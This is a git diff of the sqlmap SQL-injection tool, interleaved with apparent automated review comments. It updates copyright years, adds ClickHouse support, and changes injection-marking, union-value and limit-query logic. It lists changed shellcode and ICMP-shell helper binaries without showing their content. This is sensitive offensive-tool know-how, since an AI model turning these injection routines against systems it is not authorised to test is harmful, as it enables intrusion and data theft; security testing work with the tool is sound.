+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap funguje bez problémov s programovacím jazykom [Python](https://www.python.org/download/) vo verziách **2.6**, **2.7** a **3.x** na akejkoľvek platforme.
+
+Využitie
+----
+
+Na získanie zoznamu základných možností a prepínačov, použite:
+
+ python sqlmap.py -h
+
+Na získanie zoznamu všetkých možností a prepínačov, použite:
+
+ python sqlmap.py -hh
+
+Vzorku behu nájdete [tu](https://asciinema.org/a/46601).
+Ak chcete získať prehľad o možnostiach sqlmap, zoznam podporovaných funkcií a opis všetkých možností a prepínačov spolu s príkladmi, odporúčame vám nahliadnuť do [Používateľskej príručky](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Linky
+----
+
+* Domovská stránka: https://sqlmap.org
+* Stiahnutia: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) alebo [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Zdroje RSS Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Sledovač problémov: https://github.com/sqlmapproject/sqlmap/issues
+* Používateľská príručka: https://github.com/sqlmapproject/sqlmap/wiki
+* Často kladené otázky (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demá: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* Snímky obrazovky: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
\ No newline at end of file
diff --git a/doc/translations/README-tr-TR.md b/doc/translations/README-tr-TR.md
index cf60143f2e9..5951d109e52 100644
--- a/doc/translations/README-tr-TR.md
+++ b/doc/translations/README-tr-TR.md
@@ -23,7 +23,7 @@ Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayar
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** and **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.
+sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** ve **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.
Kullanım
----
diff --git a/extra/__init__.py b/extra/__init__.py
index 8476fab2f94..7777bded120 100644
--- a/extra/__init__.py
+++ b/extra/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/beep/__init__.py b/extra/beep/__init__.py
index 8476fab2f94..7777bded120 100644
--- a/extra/beep/__init__.py
+++ b/extra/beep/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/beep/beep.py b/extra/beep/beep.py
index ad932834021..788bafde1e3 100644
--- a/extra/beep/beep.py
+++ b/extra/beep/beep.py
@@ -3,7 +3,7 @@
"""
beep.py - Make a beep sound
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/cloak/__init__.py b/extra/cloak/__init__.py
index 8476fab2f94..7777bded120 100644
--- a/extra/cloak/__init__.py
+++ b/extra/cloak/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py
index 77cef7c4219..8f361a0cf39 100644
--- a/extra/cloak/cloak.py
+++ b/extra/cloak/cloak.py
@@ -3,7 +3,7 @@
"""
cloak.py - Simple file encryption/compression utility
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -21,7 +21,7 @@
xrange = range
ord = lambda _: _
-KEY = b"ENWsCymUeJcXqSbD"
+KEY = b"E6wRbVhD0IBeCiGJ"
def xor(message, key):
return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
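Review bot: The replaced `KEY` constant has no comment saying what depends on it, although `xor()` just below uses it as a fixed key that is public in the repository, so the result is obfuscation rather than confidentiality. Files cloaked with the old key presumably stop decoding once the value changes, which would explain the `.exe_` binaries updated in the same commit, but nothing in the hunk says so. I would add above the assignment `# NOTE: fixed XOR obfuscation key, not a secret; changing it requires re-cloaking every bundled *_ file`. The module docstring's word "encryption" is worth softening for the same reason.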
diff --git a/extra/dbgtool/__init__.py b/extra/dbgtool/__init__.py
index 8476fab2f94..7777bded120 100644
--- a/extra/dbgtool/__init__.py
+++ b/extra/dbgtool/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/dbgtool/dbgtool.py b/extra/dbgtool/dbgtool.py
index c8e0c97339c..5443af7bb02 100644
--- a/extra/dbgtool/dbgtool.py
+++ b/extra/dbgtool/dbgtool.py
@@ -3,7 +3,7 @@
"""
dbgtool.py - Portable executable to ASCII debug script converter
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/icmpsh/icmpsh.exe_ b/extra/icmpsh/icmpsh.exe_
index 0944508047e..a909351bdac 100644
Binary files a/extra/icmpsh/icmpsh.exe_ and b/extra/icmpsh/icmpsh.exe_ differ
diff --git a/extra/runcmd/runcmd.exe_ b/extra/runcmd/runcmd.exe_
index 26448b5dcb1..556eabb7be0 100644
Binary files a/extra/runcmd/runcmd.exe_ and b/extra/runcmd/runcmd.exe_ differ
diff --git a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_
index 7c19a51b45e..0cbe5404fce 100644
Binary files a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ and b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ differ
diff --git a/extra/shutils/blanks.sh b/extra/shutils/blanks.sh
index bcc7440aff4..04be57bd931 100755
--- a/extra/shutils/blanks.sh
+++ b/extra/shutils/blanks.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Removes trailing spaces from blank lines inside project files
diff --git a/extra/shutils/drei.sh b/extra/shutils/drei.sh
index 9a75fbf2f9e..2195d0a9285 100755
--- a/extra/shutils/drei.sh
+++ b/extra/shutils/drei.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Stress test against Python3
diff --git a/extra/shutils/duplicates.py b/extra/shutils/duplicates.py
index 0278b85dc3b..8f09a598a6e 100755
--- a/extra/shutils/duplicates.py
+++ b/extra/shutils/duplicates.py
@@ -1,6 +1,6 @@
#!/usr/bin/env python
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Removes duplicate entries in wordlist like files
diff --git a/extra/shutils/junk.sh b/extra/shutils/junk.sh
index e3bfc70b96b..30e83527e13 100755
--- a/extra/shutils/junk.sh
+++ b/extra/shutils/junk.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
find . -type d -name "__pycache__" -exec rm -rf {} \; &>/dev/null
diff --git a/extra/shutils/modernize.sh b/extra/shutils/modernize.sh
index e0b5352d892..d4c3da6cd69 100755
--- a/extra/shutils/modernize.sh
+++ b/extra/shutils/modernize.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# sudo pip install modernize
diff --git a/extra/shutils/pycodestyle.sh b/extra/shutils/pycodestyle.sh
index 34d995cde68..f527ed0ce46 100755
--- a/extra/shutils/pycodestyle.sh
+++ b/extra/shutils/pycodestyle.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Runs pycodestyle on all python files (prerequisite: pip install pycodestyle)
diff --git a/extra/shutils/pydiatra.sh b/extra/shutils/pydiatra.sh
index 6f964e74752..474b67a3684 100755
--- a/extra/shutils/pydiatra.sh
+++ b/extra/shutils/pydiatra.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Runs py3diatra on all python files (prerequisite: pip install pydiatra)
diff --git a/extra/shutils/pyflakes.sh b/extra/shutils/pyflakes.sh
index 9d64d9893dc..f59f5ba7765 100755
--- a/extra/shutils/pyflakes.sh
+++ b/extra/shutils/pyflakes.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)
diff --git a/extra/shutils/pylint.sh b/extra/shutils/pylint.sh
index b8898be2d36..2ba470e177e 100755
--- a/extra/shutils/pylint.sh
+++ b/extra/shutils/pylint.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pylint --rcfile=./.pylintrc '{}' \;
diff --git a/extra/shutils/pypi.sh b/extra/shutils/pypi.sh
index 4aed1e72d6e..663a4dc2169 100755
--- a/extra/shutils/pypi.sh
+++ b/extra/shutils/pypi.sh
@@ -16,7 +16,7 @@ cat > $TMP_DIR/setup.py << EOF
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -67,7 +67,7 @@ cat > sqlmap/__init__.py << EOF
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/vulnserver/__init__.py b/extra/vulnserver/__init__.py
index 8476fab2f94..7777bded120 100644
--- a/extra/vulnserver/__init__.py
+++ b/extra/vulnserver/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py
index 76f9c23762a..cfa1d1b2f4a 100644
--- a/extra/vulnserver/vulnserver.py
+++ b/extra/vulnserver/vulnserver.py
@@ -3,7 +3,7 @@
"""
vulnserver.py - Trivial SQLi vulnerable HTTP server (Note: for testing purposes)
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/__init__.py b/lib/__init__.py
index 8476fab2f94..7777bded120 100644
--- a/lib/__init__.py
+++ b/lib/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/controller/__init__.py b/lib/controller/__init__.py
index 8476fab2f94..7777bded120 100644
--- a/lib/controller/__init__.py
+++ b/lib/controller/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/controller/action.py b/lib/controller/action.py
index 1aeb0bcc409..f18795cb250 100644
--- a/lib/controller/action.py
+++ b/lib/controller/action.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index b0d5fd6b51b..186a0fd2767 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -217,6 +217,7 @@ def checkSqlInjection(place, parameter, value):
if _ > 1:
__ = 2 * (_ - 1) + 1 if _ == lower else 2 * _
unionExtended = True
+ test.request._columns = test.request.columns
test.request.columns = re.sub(r"\b%d\b" % _, str(__), test.request.columns)
title = re.sub(r"\b%d\b" % _, str(__), title)
test.title = re.sub(r"\b%d\b" % _, str(__), test.title)
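Review bot: The backup added as `test.request._columns = test.request.columns` is unconditional. If this statement can run more than once for the same test before the restore in the second checks.py hunk (`@@ -819,6 +820,9 @@`), the later pass saves an already rewritten column range and the restore brings back the wrong value; the enclosing loop is outside the hunk, so this is inferred. Guarding the assignment keeps the first, untouched value: `if not hasattr(test.request, "_columns"): test.request._columns = test.request.columns`. The restore only runs in the branch shown in that second hunk, so it should be confirmed that a leftover `_columns` is harmless on the other exits.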
@@ -819,6 +820,9 @@ def genCmpPayload():
choice = readInput(msg, default=str(conf.verbose), checkBatch=False)
conf.verbose = int(choice)
setVerbosity()
+ if hasattr(test.request, "columns") and hasattr(test.request, "_columns"):
+ test.request.columns = test.request._columns
+ delattr(test.request, "_columns")
tests.insert(0, test)
elif choice == 'N':
return None
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 2ea81d9c242..cbb8cd78c76 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -512,6 +512,23 @@ def start():
testSqlInj = True
paramKey = (conf.hostname, conf.path, place, parameter)
+ if kb.processUserMarks:
+ if testSqlInj and place not in (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI):
+ if kb.processNonCustom is None:
+ message = "other non-custom parameters found. "
+ message += "Do you want to process them too? [Y/n/q] "
+ choice = readInput(message, default='Y').upper()
+
+ if choice == 'Q':
+ raise SqlmapUserQuitException
+ else:
+ kb.processNonCustom = choice == 'Y'
+
+ if not kb.processNonCustom:
+ infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter)
+ logger.info(infoMsg)
+ continue
+
if paramKey in kb.testedParams:
testSqlInj = False
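Review bot: The new prompt defaults to `'Y'`, so when the operator has marked explicit injection points, accepting the default extends testing to every other parameter instead of staying inside the marked scope. The same presumably applies to any non-interactive run where `readInput` falls back to its default. If that is intended, it deserves a comment at the `readInput` call, e.g. `# default 'Y' widens testing beyond the user-marked points; answer 'n' to stay in scope`. Separately, `testSqlInj` is assigned `True` two lines above in this hunk, so the `testSqlInj and` part of the condition looks redundant. The surrounding loop in `start()` is outside the hunk.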
@@ -533,7 +550,7 @@ def start():
infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter)
logger.info(infoMsg)
- elif conf.paramExclude and (re.search(conf.paramExclude, parameter, re.I) or kb.postHint and re.search(conf.paramExclude, parameter.split(' ')[-1], re.I)):
+ elif conf.paramExclude and (re.search(conf.paramExclude, parameter, re.I) or kb.postHint and re.search(conf.paramExclude, parameter.split(' ')[-1], re.I) or re.search(conf.paramExclude, place, re.I)):
testSqlInj = False
infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter)
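Review bot: The extended `elif` mixes `or` and `and` without grouping, so a reader has to recall that `and` binds tighter to see that `kb.postHint` gates only the middle `re.search`. Parentheses make the intent explicit: `... or (kb.postHint and re.search(conf.paramExclude, parameter.split(' ')[-1], re.I)) or re.search(conf.paramExclude, place, re.I)`. The same ungrouped `or ... and not (...)` shape appears in the `nullAndCastField` hunk of lib/core/agent.py. Because the exclusion regex is now also searched, unanchored, against `place`, a pattern written for a parameter name can exclude a whole place, and the option's help text should say so.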
diff --git a/lib/controller/handler.py b/lib/controller/handler.py
index 227a2ceb73f..edece63bce7 100644
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -14,6 +14,7 @@
from lib.core.settings import ACCESS_ALIASES
from lib.core.settings import ALTIBASE_ALIASES
from lib.core.settings import CACHE_ALIASES
+from lib.core.settings import CLICKHOUSE_ALIASES
from lib.core.settings import CRATEDB_ALIASES
from lib.core.settings import CUBRID_ALIASES
from lib.core.settings import DB2_ALIASES
@@ -46,6 +47,8 @@
from plugins.dbms.altibase import AltibaseMap
from plugins.dbms.cache.connector import Connector as CacheConn
from plugins.dbms.cache import CacheMap
+from plugins.dbms.clickhouse.connector import Connector as ClickHouseConn
+from plugins.dbms.clickhouse import ClickHouseMap
from plugins.dbms.cratedb.connector import Connector as CrateDBConn
from plugins.dbms.cratedb import CrateDBMap
from plugins.dbms.cubrid.connector import Connector as CubridConn
@@ -122,6 +125,7 @@ def setHandler():
(DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn),
(DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn),
(DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn),
+ (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickHouseMap, ClickHouseConn),
(DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn),
(DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn),
(DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn),
diff --git a/lib/core/__init__.py b/lib/core/__init__.py
index 8476fab2f94..7777bded120 100644
--- a/lib/core/__init__.py
+++ b/lib/core/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/agent.py b/lib/core/agent.py
index 001486101f2..81d24e8b359 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -45,6 +45,7 @@
from lib.core.settings import BOUNDED_BASE64_MARKER
from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
from lib.core.settings import BOUNDED_INJECTION_MARKER
+from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import GENERIC_SQL_COMMENT
@@ -185,6 +186,11 @@ def payload(self, place=None, parameter=None, value=None, newValue=None, where=N
newValue = newValue.replace(BOUNDARY_BACKSLASH_MARKER, '\\')
newValue = self.adjustLateValues(newValue)
+ # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5488
+ if kb.customInjectionMark in origValue:
+ payload = newValue.replace(origValue, "")
+ newValue = origValue.replace(kb.customInjectionMark, payload)
+
# TODO: support for POST_HINT
newValue = "%s%s%s" % (BOUNDED_BASE64_MARKER, newValue, BOUNDED_BASE64_MARKER)
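Review bot: `newValue.replace(origValue, "")` removes every occurrence of `origValue`, not only the leading one, so the derived `payload` is right only when the original value appears exactly once in `newValue`. Limiting the replacement states that assumption in the code: `payload = newValue.replace(origValue, "", 1)`. The visible lines do not show that `origValue` and `newValue` are non-None at this point; any guard sits outside the hunk, so that should be confirmed before the `in` test and the `.replace` calls.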
@@ -222,7 +228,8 @@ def payload(self, place=None, parameter=None, value=None, newValue=None, where=N
def _(pattern, repl, string):
retVal = string
match = None
- for match in re.finditer(pattern, string):
+
+ for match in re.finditer(pattern, string or ""):
pass
if match:
@@ -489,7 +496,7 @@ def nullAndCastField(self, field):
if field and Backend.getIdentifiedDbms():
rootQuery = queries[Backend.getIdentifiedDbms()]
- if field.startswith("(CASE") or field.startswith("(IIF") or conf.noCast:
+ if field.startswith("(CASE") or field.startswith("(IIF") or conf.noCast and not (field.startswith("COUNT(") and Backend.getIdentifiedDbms() == DBMS.MSSQL):
nulledCastedField = field
else:
if not (Backend.isDbms(DBMS.SQLITE) and not isDBMSVersionAtLeast('3')):
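Review bot: The new condition in `nullAndCastField` mixes `or` and `and` without parentheses, so a reader has to recall that `and` binds tighter to see that the `COUNT(`/MSSQL exception applies only to `conf.noCast`. Writing the last operand as `(conf.noCast and not (field.startswith("COUNT(") and Backend.getIdentifiedDbms() == DBMS.MSSQL))` keeps the behaviour and makes the grouping explicit. A short comment on why MSSQL `COUNT(` still needs the cast would also help. The same unparenthesised `and`/`or` mix appears in the port condition added to `parseTargetUrl` in lib/core/common.py. The function continues outside the hunk.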
@@ -596,6 +603,9 @@ def getFields(self, query):
if not _:
fieldsSelectFrom = None
+ if re.search(r"\bWHERE\b.+(MIN|MAX)", query, re.I):
+ fieldsMinMaxstr = None
+
fieldsToCastStr = fieldsNoSelect
if fieldsSubstr:
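Review bot: The pattern `r"\bWHERE\b.+(MIN|MAX)"` has no boundary around `MIN|MAX`, so with `re.I` it also fires on identifiers that merely contain those letters after a WHERE (a column named `admin` or `max_len`, say). `fieldsMinMaxstr` is then cleared for queries that have no aggregate in the WHERE clause. If the intent is a MIN()/MAX() call inside the WHERE part, `r"\bWHERE\b.+\b(MIN|MAX)\("` expresses it; note that `.` also stops at a newline unless `(?s)` is added. A one-line comment on why the match is discarded in that case is missing. `getFields` starts and ends outside the hunk.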
@@ -881,11 +891,16 @@ def forgeUnionQuery(self, query, position, count, comment, prefix, suffix, char,
if element > 0:
unionQuery += ','
- if element == position:
+ if conf.uValues and conf.uValues.count(',') + 1 == count:
+ unionQuery += conf.uValues.split(',')[element]
+ elif element == position:
unionQuery += query
else:
unionQuery += char
+ if conf.uValues:
+ unionQuery = unionQuery.replace(CUSTOM_INJECTION_MARK_CHAR, query)
+
if fromTable and not unionQuery.endswith(fromTable):
unionQuery += fromTable
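Review bot: `conf.uValues.split(',')[element]` splits on every comma, so a column value that itself contains one shifts the column count, and the loop silently falls back to the `element == position` path. Quoted strings and two-argument function calls are examples, and the `--union-values` check in lib/core/option.py lets both through. Either restrict the accepted syntax to comma-free values or state the restriction in the option's error text. The split is also recomputed on each iteration; `values = conf.uValues.split(',')` before the loop, then `len(values) == count` and `values[element]`, reads better. The loop header is outside the hunk.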
@@ -1016,16 +1031,16 @@ def limitQuery(self, num, query, field=None, uniqueField=None):
fromFrom = limitedQuery[fromIndex + 1:]
orderBy = None
- if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CUBRID, DBMS.EXTREMEDB, DBMS.RAIMA):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CUBRID, DBMS.EXTREMEDB, DBMS.DERBY):
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
limitedQuery += " %s" % limitStr
- elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE,):
- limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, 1)
+ elif Backend.getIdentifiedDbms() in (DBMS.H2, DBMS.CRATEDB, DBMS.CLICKHOUSE):
+ limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num)
limitedQuery += " %s" % limitStr
- elif Backend.getIdentifiedDbms() in (DBMS.DERBY, DBMS.CRATEDB):
- limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num)
+ elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE,):
+ limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, 1)
limitedQuery += " %s" % limitStr
elif Backend.getIdentifiedDbms() in (DBMS.FRONTBASE, DBMS.VIRTUOSO):
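Review bot: `DBMS.RAIMA` is removed from the first branch of `limitQuery` and does not reappear in any branch this hunk shows, while `DBMS.H2` and `DBMS.DERBY` are moved rather than dropped. If Raima is handled by a branch below the hunk that is fine; if not, its `limit.query` is no longer applied, so this is worth confirming against the rest of the chain. The three branches differ only in argument order, `(num, 1)`, `(1, num)` and `(num + 1, 1)`, so a comment per branch naming what each position means would make moves like this easier to review.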
diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index 3cccd2d1ec6..2fabc7087ae 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/common.py b/lib/core/common.py
index a691edc2ac3..e76521dd3ca 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -1769,7 +1769,7 @@ def parseTargetUrl():
errMsg = "invalid target URL port (%d)" % conf.port
raise SqlmapSyntaxException(errMsg)
- conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path))
+ conf.url = getUnicode("%s://%s%s%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, (":%d" % conf.port) if not (conf.port == 80 and conf.scheme == "http" or conf.port == 443 and conf.scheme == "https") else "", conf.path))
conf.url = conf.url.replace(URI_QUESTION_MARKER, '?')
if urlSplit.query:
@@ -3182,7 +3182,14 @@ def isNumPosStrValue(value):
False
"""
- return ((hasattr(value, "isdigit") and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0)) and int(value) < MAX_INT
+ retVal = False
+
+ try:
+ retVal = ((hasattr(value, "isdigit") and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0)) and int(value) < MAX_INT
+ except ValueError:
+ pass
+
+ return retVal
@cachedmethod
def aliasToDbmsEnum(dbms):
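Review bot: The `except ValueError: pass` added to `isNumPosStrValue` has no comment saying which input raises, and a silent `pass` tends to be removed or widened later. `isdigit()` is true for some characters that `int()` rejects (superscript digits, for instance), which is presumably the case being handled. A comment such as `# NOTE: isdigit() accepts characters (e.g. u'\xb2') that int() cannot parse`, plus a doctest for such a value, would pin the behaviour down.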
@@ -3861,6 +3868,10 @@ def checkIntegrity():
logger.error("wrong modification time of '%s'" % filepath)
retVal = False
+ suffix = extractRegexResult(r"#(?P\w+)", VERSION_STRING)
+ if suffix and suffix not in {"dev", "stable"}:
+ retVal = False
+
return retVal
def getDaysFromLastUpdate():
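Review bot: The new suffix check in `checkIntegrity` sets `retVal = False` without logging anything, unlike the branch just above it which reports `wrong modification time of ...`. A failed check therefore gives no hint of its cause. Adding `logger.error("unexpected version suffix '%s'" % suffix)` and a one-line comment on why only `dev` and `stable` are accepted would make the result explainable. As rendered here the named group has lost its name (`(?P\w+)`), presumably a page artifact, so the pattern should be checked against the repository copy.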
@@ -4940,6 +4951,12 @@ def decodeDbmsHexValue(value, raw=False):
>>> decodeDbmsHexValue('3132332031') == u'123 1'
True
+ >>> decodeDbmsHexValue('31003200330020003100') == u'123 1'
+ True
